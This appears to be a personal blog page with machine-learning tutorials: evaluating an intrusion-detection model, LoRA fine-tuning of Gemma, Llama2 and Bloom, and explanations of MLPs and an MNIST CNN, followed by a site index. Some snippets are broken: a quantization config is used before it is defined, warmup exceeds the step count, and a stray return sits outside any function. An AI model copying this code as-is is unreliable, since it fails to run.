with torch.no_grad():
    for i, data in enumerate(X_test):
     y_val = model.forward(data)
     print(f'{i+1}.) {str(y_val)} \t {y_test[i]} \t {y_val.argmax().item()}')
     if y_val.argmax().item() == y_test[i]:
        correct+=1
print(correct)

Model Metrics

I calculate accuracy, precision, recall, and plot the confusion matrix.

import torch
from sklearn.metrics import accuracy_score, classification_report, precision_score, recall_score
model.eval()
predictions = []
labels = []
with torch.no_grad():
    for data, label in zip(X_test, y_test):
        y_val = model(data.unsqueeze(0))  
        _, predicted = torch.max(y_val, dim=1)
        predictions.append(predicted.item())
        labels.append(label.item())

accuracy = accuracy_score(labels, predictions)
precision = precision_score(labels, predictions, average='weighted')
recall = recall_score(labels, predictions, average='weighted')
report = classification_report(labels, predictions)
print(f'Accuracy: {accuracy * 100:.2f}%')
print(f'Precision: {precision * 100:.2f}%')
print(f'Recall: {recall * 100:.2f}%')
print("Classification Report:")
print(report)

Confusion Matrix

Finally, I will visualize the confusion matrix to understand the performance of our model better.

from sklearn.metrics import classification_report, accuracy_score, precision_score, recall_score, confusion_matrix
import seaborn as sns

neuralnetwork = confusion_matrix(labels, predictions)
plt.figure(figsize=(8, 6))
sns.heatmap(neuralnetwork, annot=True, fmt='d', cmap='Blues', xticklabels=['Negative', 'Positive'], yticklabels=['Negative', 'Positive'])
plt.xlabel('Predicted Label')
plt.ylabel('True Label')
plt.title('Confusion Matrix')
plt.show()

Conclusion

In this blog post, I built an AI-powered Intrusion Detection System using machine learning techniques. I walked through the steps of data preprocessing, model building, training, and evaluation. By following these steps, you can create a robust IDS to enhance the security of network systems.

Fine-Tuning Gemma Google

Mohammed Alshukaili — Wed, 19 Jun 2024 20:45:59 GMT

In this blog post, I will explore the process of finetuning a language model using Low-Rank Adaptation (LoRA). I will cover everything from setting up the environment to training and evaluating the model on a dataset of quotes.

Setting Up the Environment

First, I need to install the necessary libraries.

!pip3 install -q -U bitsandbytes==0.42.0
!pip3 install -q -U peft==0.8.2
!pip3 install -q -U trl==0.7.10
!pip3 install -q -U accelerate==0.27.1
!pip3 install -q -U datasets==2.17.0
!pip3 install -q -U transformers==4.38.0

Loading the Model and Tokenizer

Next, I will load the model and tokenizer. I am using the AutoTokenizer and AutoModelForCausalLM from the Hugging Face transformers library.

import os
import transformers
import torch
from datasets import load_dataset
from google.colab import userdata
from trl import SFTTrainer
from peft import LoraConfig
from transformers import AutoTokenizer, AutoModelForCausalLM, Trainer
from transformers import BitsAndBytesConfig, GemmaTokenizer

model_id = "google/gemma-2b"
tokenizer = AutoTokenizer.from_pretrained(model_id, token=os.environ['HF_TOKEN'])
model = AutoModelForCausalLM.from_pretrained(model_id, quantization_config=bnb_config, device_map={"":0}, token=os.environ['HF_TOKEN'])

Quantization Configuration

I will configure the model to use 4-bit quantization, which allows us to run larger models on smaller hardware.

bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.bfloat16
)

Generating Text with the Model

Before we start training, let's generate some text to see how the model performs out of the box.

text = "Quote: add quote,"
device = "cuda:0"
inputs = tokenizer(text, return_tensors="pt").to(device)

outputs = model.generate(**inputs, max_length=50, max_new_tokens=50)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))

Configuring LoRA

LoRA (Low-Rank Adaptation) helps to efficiently fine-tune models by adding trainable adaptation matrices.

os.environ["WANDB_DISABLED"] = "false"
lora_config = LoraConfig(
    r=8,
    target_modules=["q_proj", "o_proj", "k_proj", "v_proj", "gate_proj", "up_proj", "down_proj"],
    task_type="CAUSAL_LM",
)

Preparing the Dataset

I will use the datasets library to load and preprocess the dataset of quotes.

data = load_dataset("Abirate/english_quotes")
data = data.map(lambda samples: tokenizer(samples["quote"]), batched=True)

def formatting_func(example):
    text = f"Quote: {example['quote'][0]}\nAuthor: {example['author'][0]}"
    return [text]

Training the Model

I use the SFTTrainer from the trl library to train the model with the LoRA configuration.

trainer = SFTTrainer(
    model=model,
    train_dataset=data["train"],
    args=transformers.TrainingArguments(
        per_device_train_batch_size=1,
        gradient_accumulation_steps=4,
        warmup_steps=200,
        max_steps=100,
        learning_rate=2e-4,
        fp16=True,
        logging_steps=1,
        output_dir="outputs",
        optim="paged_adamw_8bit"
    ),
    peft_config=lora_config,
    formatting_func=formatting_func,
)

trainer.train()

Evaluating the Model

After training, I can generate text again to see how the model's performance has improved.

text = "Quote: add quote,"
device = "cuda:0"
inputs = tokenizer(text, return_tensors="pt").to(device)

outputs = model.generate(**inputs, max_length=50, max_new_tokens=50)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))

Conclusion

I walked through the process of finetuning a language model using LoRA. This method allows for efficient training by focusing on specific layers of the model. I demonstrated how to set up the environment, configure the model, prepare the dataset, and train the model. With this approach, you can adapt large language models to specific tasks with limited computational resources.

Fine-Tuning Llama2

Mohammed Alshukaili — Wed, 19 Jun 2024 20:41:38 GMT

In this tutorial, I will walk through the steps to fine-tune LLaMA2 using the Hugging Face Transformers library, along with LoRA (Low-Rank Adaptation) to make the process more efficient.

Setting Up the Environment

Start by setting up the environment and importing the necessary libraries.

import os
import torch
from datasets import load_dataset
from transformers import (
    AutoModelForCausalLM,
    AutoTokenizer,
    BitsAndBytesConfig,
    HfArgumentParser,
    TrainingArguments,
    pipeline,
    logging,
)
from peft import LoraConfig, PeftModel
from trl import SFTTrainer

Loading the Dataset

Load the dataset that will be used for fine-tuning.

dataset_name = "mlabonne/guanaco-llama2-1k"
dataset = load_dataset(dataset_name, split="train")

Configuring the Model for Fine-Tuning

BitsAndBytes Configuration

Configure the BitsAndBytes settings to enable 4-bit quantization for efficient training.

model_name = "NousResearch/Llama-2-7b-hf"
use_4bit = True
bnb_4bit_compute_dtype = "float16"
bnb_4bit_quant_type = "nf4"
use_nested_quant = False

compute_dtype = getattr(torch, bnb_4bit_compute_dtype)
bnb_config = BitsAndBytesConfig(
    load_in_4bit=use_4bit,
    bnb_4bit_quant_type=bnb_4bit_quant_type,
    bnb_4bit_compute_dtype=compute_dtype,
    bnb_4bit_use_double_quant=use_nested_quant,
)

Loading the Base Model and Tokenizer

Load the base LLaMA model and tokenizer.

device_map = {"": 0}

# Load base model
model = AutoModelForCausalLM.from_pretrained(
    model_name,
    quantization_config=bnb_config,
    device_map=device_map
)
model.config.use_cache = False
model.config.pretraining_tp = 1

# Load LLaMA tokenizer
tokenizer = AutoTokenizer.from_pretrained(model_name, trust_remote_code=True)
tokenizer.pad_token = tokenizer.eos_token
tokenizer.padding_side = "right"

Applying LoRA Configuration

Configure LoRA for parameter-efficient fine-tuning.

lora_r = 64
lora_alpha = 16
lora_dropout = 0.1

peft_config = LoraConfig(
    lora_alpha=lora_alpha,
    lora_dropout=lora_dropout,
    r=lora_r,
    bias="none",
    task_type="CAUSAL_LM",
)

Defining Training Arguments

Set up the training arguments for the fine-tuning process.

output_dir = "./results"
num_train_epochs = 1
fp16 = False
bf16 = True
per_device_train_batch_size = 4
gradient_accumulation_steps = 1
save_steps = 0
logging_steps = 25
learning_rate = 2e-4
weight_decay = 0.001
optim = "paged_adamw_32bit"
lr_scheduler_type = "cosine"
max_steps = -1
warmup_ratio = 0.03
group_by_length = True

training_arguments = TrainingArguments(
    output_dir=output_dir,
    num_train_epochs=num_train_epochs,
    per_device_train_batch_size=per_device_train_batch_size,
    gradient_accumulation_steps=gradient_accumulation_steps,
    optim=optim,
    save_steps=save_steps,
    logging_steps=logging_steps,
    learning_rate=learning_rate,
    weight_decay=weight_decay,
    fp16=fp16,
    bf16=bf16,
    max_grad_norm=0.3,
    max_steps=max_steps,
    warmup_ratio=warmup_ratio,
    group_by_length=group_by_length,
    lr_scheduler_type=lr_scheduler_type,
    report_to="tensorboard"
)

Fine-Tuning the Model

Set up the trainer and start the fine-tuning process.

max_seq_length = None
packing = False

trainer = SFTTrainer(
    model=model,
    train_dataset=dataset,
    peft_config=peft_config,
    dataset_text_field="text",
    max_seq_length=max_seq_length,
    tokenizer=tokenizer,
    args=training_arguments,
    packing=packing,
)

trainer.train()

Saving the Fine-Tuned Model

Save the fine-tuned model for future use.

new_model = "Llama-2-7b-chat-finetune"
trainer.model.save_pretrained(new_model)

Testing the Fine-Tuned Model

Generate text using the fine-tuned model to verify its performance.

logging.set_verbosity(logging.CRITICAL)

prompt = "How to fly a plane?"
pipe = pipeline(task="text-generation", model=model, tokenizer=tokenizer, max_length=200)
result = pipe(f"[INST] {prompt} [/INST]")
print(result[0]['generated_text'])

Conclusion

~~I have successfully fine-tuned the LLaMA2 model using LoRA and the Hugging Face Transformers library. This process enables efficient model adaptation even with limited computational resources.~~

Fine-Tuning Bloom AI Model

Mohammed Alshukaili — Wed, 19 Jun 2024 20:36:07 GMT

In this blog post, I will explore how to fine-tune a large language model using LoRA (Low-Rank Adaptation). I will use the bloom-3b model from Hugging Face and perform fine-tuning on the SQuAD v2 dataset.
Setup and Installation
First, I need to install the necessary libraries. This includes bitsandbytes, datasets, accelerate, loralib, and peft.
!pip install -q bitsandbytes datasets accelerate loralib !pip install -q git+https://github.com/huggingface/peft.git !pip install -q git+https://github.com/huggingface/transformers.git import os os.environ["CUDA_VISIBLE_DEVICES"] = "0"
Model Preparation
Load the bloom-3b model and tokenizer, and prepare the model for fine-tuning.
import torch import torch.nn as nn import bitsandbytes as bnb from transformers import AutoTokenizer, AutoConfig, AutoModelForCausalLM model = AutoModelForCausalLM.from_pretrained( "bigscience/bloom-3b", torch_dtype=torch.float16, device_map='auto' ) tokenizer = AutoTokenizer.from_pretrained("bigscience/bloom-3b") for param in model.parameters(): param.requires_grad = False if param.ndim == 1: param.data = param.data.to(torch.float32) model.gradient_checkpointing_enable() model.enable_input_require_grads() class CastOutputFloat(nn.Sequential): def forward(self, x): return super().forward(x).to(torch.float32) model.lm_head = CastOutputFloat(model.lm_head)
LoRA Configuration
Configure the model to use LoRA for fine-tuning. This involves setting up a LoRA configuration and applying it to the model.
from peft import LoraConfig, get_peft_model config = LoraConfig( r=8, lora_alpha=16, target_modules=["query_key_value"], lora_dropout=0.05, bias="none", task_type="CAUSAL_LM", ) model = get_peft_model(model, config) def print_trainable_parameters(model): trainable_params = 0 all_param = 0 for _, param in model.named_parameters(): all_param += param.numel() if param.requires_grad: trainable_params += param.numel() print(f"trainable parameters: {trainable_params} || all parameters: {all_param} || percentage: {trainable_params/all_param*100:.2f}%") print_trainable_parameters(model)
Dataset Preparation
Load the SQuAD v2 dataset and preprocess it for training.

from datasets import load_dataset

qa_dataset = load_dataset("squad_v2")

def create_prompt(context, question, answer):
    if len(answer["text"]) < 1:
        answer_text = "Cannot answer"
    else:
        answer_text = answer["text"][0]
    prompt_template = f"### CONTEXT\n{context}\n\n### QUESTION\n{question}\n\n### ANSWER\n{answer_text}"
    return prompt_template

mapped_qa_dataset = qa_dataset.map(
    lambda samples: tokenizer(
        create_prompt(samples['context'], samples['question'], samples['answers'])))

Training the Model

Set up the training arguments and train the model using the Trainer class from Hugging Face Transformers.

import transformers

trainer = transformers.Trainer(
    model=model,
    train_dataset=mapped_qa_dataset["train"],
    args=transformers.TrainingArguments(
        per_device_train_batch_size=4,
        gradient_accumulation_steps=4,
        warmup_steps=100,
        max_steps=100,
        learning_rate=1e-3,
        fp16=True,
        logging_steps=1,
        output_dir='outputs',
    ),
    data_collator=transformers.DataCollatorForLanguageModeling(tokenizer, mlm=False)
)

model.config.use_cache = False
trainer.train()

Model Deployment

HUGGING_FACE_USER_NAME = "Mohammedxo51"

from huggingface_hub import notebook_login
notebook_login()

model_name = "squad-bloom-3b"

model.push_to_hub(f"{HUGGING_FACE_USER_NAME}/{model_name}", use_auth_token=True)

Inference

Load the fine-tuned model and tokenizer, and perform inference to answer questions based on provided context.

from peft import PeftModel, PeftConfig
from transformers import AutoModelForCausalLM, AutoTokenizer

peft_model_id = f"{HUGGING_FACE_USER_NAME}/{model_name}"
config = PeftConfig.from_pretrained(peft_model_id)
model = AutoModelForCausalLM.from_pretrained(config.base_model_name_or_path, return_dict=True, load_in_8bit=False, device_map='auto')
tokenizer = AutoTokenizer.from_pretrained(config.base_model_name_or_path)

qa_model = PeftModel.from_pretrained(model, peft_model_id)

from IPython.display import display, Markdown

def make_inference(context, question):
    prompt = f"### CONTEXT\n{context}\n\n### QUESTION\n{question}\n\n### ANSWER\n"
    inputs = tokenizer(prompt, return_tensors="pt")
    inputs = {k: v.to(qa_model.device) for k, v in inputs.items()}

    with torch.cuda.amp.autocast():
        output_tokens = qa_model.generate(**inputs, max_new_tokens=200, pad_token_id=tokenizer.eos_token_id)

    answer = tokenizer.decode(output_tokens[0], skip_special_tokens=True)
    display(Markdown(answer))

context = "Some context"
question = "A question about the context?"
make_inference(context, question)

Conclusion

In this blog post, I covered the steps to fine-tune a large language model using LoRA. I demonstrated how to set up the environment, prepare the model, configure LoRA, preprocess the dataset, train the model, deploy it to the Hugging Face Hub, and perform inference. This approach allows for efficient fine-tuning with a significantly reduced number of trainable parameters.

Multi-Layer Perceptron (MLP)

Mohammed Alshukaili — Wed, 19 Jun 2024 05:33:58 GMT

This blog post dives deep into Multi-Layer Perceptrons (MLP), the building blocks of deep learning. Explore how they model complex data to drive AI innovations in fields like voice recognition and financial forecasting.

What is a Neuron?

In the context of neural networks, a neuron is a basic unit, similar to a tiny processing element in a computer. Imagine it as a small worker in your brain that receives input, processes it, and passes on the output. In a Multi-Layer Perceptron, each neuron receives signals from previous layers, processes these signals by performing simple calculations, and then sends the result to the next layer of neurons. This process is much like passing a message along in a game of telephone, where each player adds a little bit to the message before passing it on. Neurons work together in layers to handle complex tasks like recognizing faces or understanding spoken words.

Structure of an MLP

A Multi-Layer Perceptron (MLP) is like a complex network made up of layers stacked one after another. Each layer is filled with neurons, those tiny workers that process and pass on information. The first layer, called the input layer, receives the initial data, like images or sounds. The last layer, known as the output layer, gives the final result, like identifying an object in a picture. Between the input and output, there are one or more hidden layers where most of the processing happens. These layers work together to transform the input data step-by-step into a form that the output layer can use to make a decision or prediction. This layered structure allows MLPs to learn from data and make smart decisions based on what they've learned.

The Forward Pass: Data Flow through Layers.

In a Multi-Layer Perceptron (MLP), the forward pass is like data going through a series of gates. It starts at the input layer, where each neuron looks at a piece of the data and does a simple math problem. Think of this as the first gate, where the data gets a quick check. Then, the data moves to the next layer, or the next gate, where it gets checked again but in a slightly different way. Each layer works like a gate, making the data a bit clearer and more useful every time it passes through one. By the time the data reaches the output layer, the last gate, it's fully processed and ready to give us an answer or decision. The whole journey is straightforward, with data moving from one gate to the next without going back.

Activation Functions.

Activation functions in a Multi-Layer Perceptron (MLP) are like special rules that decide how a neuron should react to the information it receives. Without activation functions, an MLP would just perform simple, straightforward calculations, which might not be enough to solve more complex problems like recognizing images or understanding speech.

Think of activation functions as filters at a playground slide. These filters decide how much of the incoming signals (kids wanting to slide) should actually go through. Some signals might trigger a strong reaction and send lots of data forward (like a big push that sends a kid sliding fast), while others might not do much at all (like a gentle push that only moves the kid a little).

By using these rules or filters, MLPs can handle information in more complex and nuanced ways, which is essential for dealing with the tricky, non-straightforward tasks we often ask them to perform. This ability to process information in non-linear, varied ways is what makes MLPs so powerful in the world of artificial intelligence.

Backpropagation Algorithm: Learning from Errors.

The backpropagation algorithm is like a teacher who helps a Multi-Layer Perceptron (MLP) learn from its mistakes. When an MLP tries to make a prediction, such as guessing what's in a picture, it might not always get it right. The backpropagation algorithm checks the MLP's answer against the correct answer and then figures out where the MLP went wrong.

Think of it like going back over a path of footprints to see where you slipped. The algorithm starts from the end (the wrong answer) and moves backwards through the network, adjusting things slightly at each layer to correct the mistake. It tells each neuron in the MLP how to change its calculations to be more accurate next time. This process of moving backward and making adjustments helps the MLP improve, so it can make better guesses in the future. It's like learning through trial and error, constantly tweaking and improving based on feedback.

Conclusion

In conclusion, Multi-Layer Perceptrons (MLPs) are a fundamental tool in the world of deep learning, helping machines tackle complex tasks by mimicking the way our brains work. From understanding how MLPs function to seeing them in action with practical examples, we've explored the significant role they play in advancing artificial intelligence. Whether you're just starting out or looking to deepen your knowledge, the journey into neural networks is as exciting as it is rewarding. Happy exploring, and keep learning!

Convolutional Neural Network (CNN)

Mohammed Alshukaili — Wed, 19 Jun 2024 05:33:51 GMT

In this blog, I will discuss Convolutional Neural Networks (CNNs) and demonstrate how to build a neural network for digit image classification.

Brief overview of CNN and its applications

Convolutional Neural Networks (CNNs) are deep learning models designed for image processing. They are used in image classification, object detection, image segmentation, facial recognition, autonomous vehicles, and enhancing text data processing in natural language processing.

Loading and Preprocessing the MNIST Dataset

To start building our CNN model, the first step is to load and preprocess the MNIST dataset. The MNIST dataset consists of 60,000 training images and 10,000 testing images of handwritten digits, each of size 28x28 pixels.

Loading the Dataset:

We use the mnist module from tensorflow.keras.datasets to load the dataset. The load_data() function returns four NumPy arrays: the training images (trainX), training labels (trainY), testing images (testX), and testing labels (testY).

from tensorflow.keras.datasets import mnist

# load train and test dataset
(trainX, trainY), (testX, testY) = mnist.load_data()

Reshaping and Encoding the Data:

Since CNNs expect the input data to have a single color channel, we need to reshape the data. The reshape() function modifies the shape of the images to (28, 28, 1).

Additionally, the labels need to be one-hot encoded, converting the integer labels into binary class matrices using the to_categorical() function from tensorflow.keras.utils.

from tensorflow.keras.utils import to_categorical

# reshape dataset to have a single channel
trainX = trainX.reshape((trainX.shape[0], 28, 28, 1))
testX = testX.reshape((testX.shape[0], 28, 28, 1))

# one hot encode target values
trainY = to_categorical(trainY)
testY = to_categorical(testY)

Preparing Pixel Data

Before feeding the MNIST dataset into our Convolutional Neural Network (CNN), it's crucial to preprocess the pixel values to ensure the model performs optimally. This step involves normalizing the pixel values to a range that the neural network can handle more efficiently.

Converting Pixel Values to Floats:

The pixel values in the MNIST dataset are originally integers ranging from 0 to 255. To normalize these values, we first need to convert them to floats. This conversion ensures that subsequent operations, like division for normalization, are performed correctly.

# convert from integers to floats
train_norm = train.astype('float32')
test_norm = test.astype('float32')

Normalizing to Range 0-1:

Neural networks perform better when input values are normalized. In this case, we scale the pixel values from the original range of 0-255 to a range of 0-1. This is done by dividing each pixel value by 255.0.

# normalize to range 0-1
train_norm = train_norm / 255.0
test_norm = test_norm / 255.0
# return normalized images
return train_norm, test_norm

Complete Function:

# scale pixels
def prep_pixels(train, test):
    # convert from integers to floats
    train_norm = train.astype('float32')
    test_norm = test.astype('float32')
    # normalize to range 0-1
    train_norm = train_norm / 255.0
    test_norm = test_norm / 255.0
    # return normalized images
    return train_norm, test_norm

Defining the CNN Model

1.Convolutional Layer:

The first layer is a 2D convolutional layer with 32 filters, a kernel size of 3x3, and ReLU activation function. This layer uses the 'he_uniform' initializer for the kernel weights and expects input images of shape (28, 28, 1).

model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', input_shape=(28, 28, 1)))

2.Max Pooling Layer:

Following the convolutional layer, we add a max pooling layer with a pool size of 2x2. This layer reduces the spatial dimensions of the feature maps, which helps to decrease computational load and control overfitting.

model.add(MaxPooling2D((2, 2)))

3.Flatten Layer:

Next, we flatten the 2D feature maps into a 1D vector. This step prepares the data for the fully connected layers.

model.add(Flatten())

4.Fully Connected (Dense) Layer:

We add a dense layer with 100 units and ReLU activation. This layer further processes the features extracted by the convolutional layers.

model.add(Dense(100, activation='relu', kernel_initializer='he_uniform'))

5.Output Layer:

The final layer is a dense layer with 10 units and a softmax activation function. This layer outputs the probabilities for each of the 10 digit classes.

model.add(Dense(10, activation='softmax'))

Compiling the Model:

After defining the model architecture, we need to compile the model. Compilation involves specifying the optimizer, loss function, and evaluation metrics. We use the Stochastic Gradient Descent (SGD) optimizer with a learning rate of 0.01 and momentum of 0.9. The loss function is categorical cross-entropy, suitable for multi-class classification tasks. We also specify accuracy as the evaluation metric.

Complete Function:

# define cnn model
def define_model():
    model = Sequential()
    model.add(Conv2D(32, (3, 3), activation='relu', kernel_initializer='he_uniform', input_shape=(28, 28, 1)))
    model.add(MaxPooling2D((2, 2)))
    model.add(Flatten())
    model.add(Dense(100, activation='relu', kernel_initializer='he_uniform'))
    model.add(Dense(10, activation='softmax'))
    # compile model
    opt = SGD(learning_rate=0.01, momentum=0.9)
    model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])
    return model

Evaluating the Model with K-Fold Cross-Validation

To ensure our Convolutional Neural Network (CNN) model generalizes well to unseen data, we evaluate its performance using K-fold cross-validation. This technique involves splitting the training data into K subsets (folds), training the model on K-1 folds, and validating it on the remaining fold. This process is repeated K times, with each fold used exactly once for validation.

Setting Up K-Fold Cross-Validation:

We use the KFold class from sklearn.model_selection to create the K-fold splits. Here, we specify 5 folds and enable shuffling with a fixed random seed for reproducibility.

from sklearn.model_selection import KFold

# prepare cross validation
kfold = KFold(n_folds, shuffle=True, random_state=1)

Training and Evaluating the Model:

For each fold, we:

Define a new instance of the CNN model.
Split the data into training and validation sets based on the current fold.
Train the model on the training set for 10 epochs with a batch size of 32.
Evaluate the model on the validation set and store the accuracy score and training history.

# enumerate splits
for train_ix, test_ix in kfold.split(dataX):
    # define model
    model = define_model()
    # select rows for train and test
    trainX, trainY, testX, testY = dataX[train_ix], dataY[train_ix], dataX[test_ix], dataY[test_ix]
    # fit model
    history = model.fit(trainX, trainY, epochs=10, batch_size=32, validation_data=(testX, testY), verbose=0)
    # evaluate model
    _, acc = model.evaluate(testX, testY, verbose=0)
    print('> %.3f' % (acc * 100.0))
    # stores scores
    scores.append(acc)
    histories.append(history)

Complete Function:

# evaluate a model using k-fold cross-validation
def evaluate_model(dataX, dataY, n_folds=5):
    scores, histories = list(), list()
    # prepare cross validation
    kfold = KFold(n_folds, shuffle=True, random_state=1)
    # enumerate splits
    for train_ix, test_ix in kfold.split(dataX):
        # define model
        model = define_model()
        # select rows for train and test
        trainX, trainY, testX, testY = dataX[train_ix], dataY[train_ix], dataX[test_ix], dataY[test_ix]
        # fit model
        history = model.fit(trainX, trainY, epochs=10, batch_size=32, validation_data=(testX, testY), verbose=0)
        # evaluate model
        _, acc = model.evaluate(testX, testY, verbose=0)
        print('> %.3f' % (acc * 100.0))
        # store scores
        scores.append(acc)
        histories.append(history)
    return scores, histories

Visualizing Learning Curves

To gain insights into how well our Convolutional Neural Network (CNN) model is training and generalizing, we can visualize the learning curves for both loss and accuracy over epochs. These curves help us understand the model's performance on the training and validation sets during the training process.

Plotting Learning Curves:

We use the matplotlib.pyplot library to create plots that display the training and validation loss and accuracy for each epoch. The summarize_diagnostics() function handles this task by iterating over the training histories recorded during cross-validation.

Loss Curves:
- The first subplot displays the cross-entropy loss for both the training and validation datasets.
- This helps us see how the model's loss decreases over time and whether it converges.
Accuracy Curves:
- The second subplot shows the classification accuracy for both the training and validation datasets.
- This illustrates how the model's accuracy improves over time.

from matplotlib import pyplot as plt

# plot diagnostic learning curves
def summarize_diagnostics(histories):
    for i in range(len(histories)):
        # plot loss
        plt.subplot(2, 1, 1)
        plt.title('Cross Entropy Loss')
        plt.plot(histories[i].history['loss'], color='blue', label='train')
        plt.plot(histories[i].history['val_loss'], color='orange', label='test')
        plt.legend(['train', 'test'], loc='upper right')

        # plot accuracy
        plt.subplot(2, 1, 2)
        plt.title('Classification Accuracy')
        plt.plot(histories[i].history['accuracy'], color='blue', label='train')
        plt.plot(histories[i].history['val_accuracy'], color='orange', label='test')
        plt.legend(['train', 'test'], loc='upper right')

    plt.show()

Conclusion

In this blog post, we explored the process of building and evaluating a Convolutional Neural Network (CNN) for classifying handwritten digits from the MNIST dataset. We covered the steps of loading and preprocessing the data, defining the CNN model, and evaluating its performance using K-fold cross-validation. Additionally, we visualized learning curves to gain insights into the model's training process.

By following these steps, we demonstrated how CNNs can effectively learn and generalize from image data, achieving high accuracy in digit classification. This foundational knowledge can be applied to various other image classification tasks, showcasing the power and versatility of CNNs in computer vision applications.

Mohammed

Machine Learning Models in Network Security

Introduction

Problem Description

Scope

Research Questions

Question 1

Question 2

Question 3

Extracting Root Creds From Running Services

Digit Classifier

Requirements

1- Data Loading and Preprocessing

load_dataset()

prep_pixels(train, test)

define_model()

2- Evaluation with K-Fold Cross-Validation

evaluate_model(dataX, dataY, n_folds=5)

summarize_diagnostics

summarize_performance(scores)

3- Model Training and Saving

run_test_harness()

save_model()

4- Making Predictions

classify_digit(image)

4- Build the Front-End

@st.cache_resource + load_mnist_model()

st_canvas

preprocess_image(image_data)

Live Prediction and Visualization

Run the App

Fine-Tuning LLaMA 3.1 with Unsloth

Introduction to LLM Inference

1. Setting Up the Environment

2. Model Configuration and Loading

3. Applying LoRA for Efficient Fine-Tuning

4. Loading and Preprocessing the Dataset

5. Formatting the Dataset

6. Tokenizing the Dataset

7. Fine-Tuning the Model

8. Saving the Fine-Tuned Model

Conclusion

Graduation Planning

Sprint 1

Sprint 2

Sprint 3

Sprint 4

Sprint 5

Sprint 6

KV Cache in LLMs

Introduction to LLM Inference

KV (Key-Value) cache

How KV Cache Works in LLMs

3.1 Storing Key-Value Pairs

3.2 Reusing Past Context

3.3 Benefits of KV Cache

Performance Impact of KV Caching

4.1 Speed Improvements

4.2 Memory Efficiency

4.3 Handling Long Sequences

4.4 Benchmarking KV Caching Performance

Conclusion

References

Graduation Logbook

Weeks 1 and 2 (September 2, 2024 - September 13, 2024)

Weeks 3 and 4 (September 16, 2024 - September 27, 2024)

Weeks 5 and 6 (September 30, 2024 - October 11, 2024)

Weeks 7 and 8 (October 14, 2024 - November 01, 2024)

Weeks 9 and 10 (November 4, 2024 - November 15, 2024)

Weeks 11 and 12 (November 18, 2024 - November 29, 2024)

Weeks 13 and 14 (December 02, 2024 - December 13, 2024)

Weeks 15 and 16 (December 16, 2024 - January 10, 2025) + Christmas Break

Weeks 17 and 18 (January 13, 2025 - January 24, 2025) + Christmas Break

Hosting Llama 3.1 Locally with Dual RTX 4090

Creating a Virtual Environment

Installing vLLM

Installing Tokenizers

Installing Tokenizers

Conclusion

RAG Using Llama3

`load_dataset()`

`prep_pixels(train, test)`

`define_model()`

`evaluate_model(dataX, dataY, n_folds=5)`

`summarize_diagnostics`

`summarize_performance(scores)`

`run_test_harness()`

`save_model()`

`classify_digit(image)`

`@st.cache_resource` + `load_mnist_model()`

`st_canvas`

`preprocess_image(image_data)`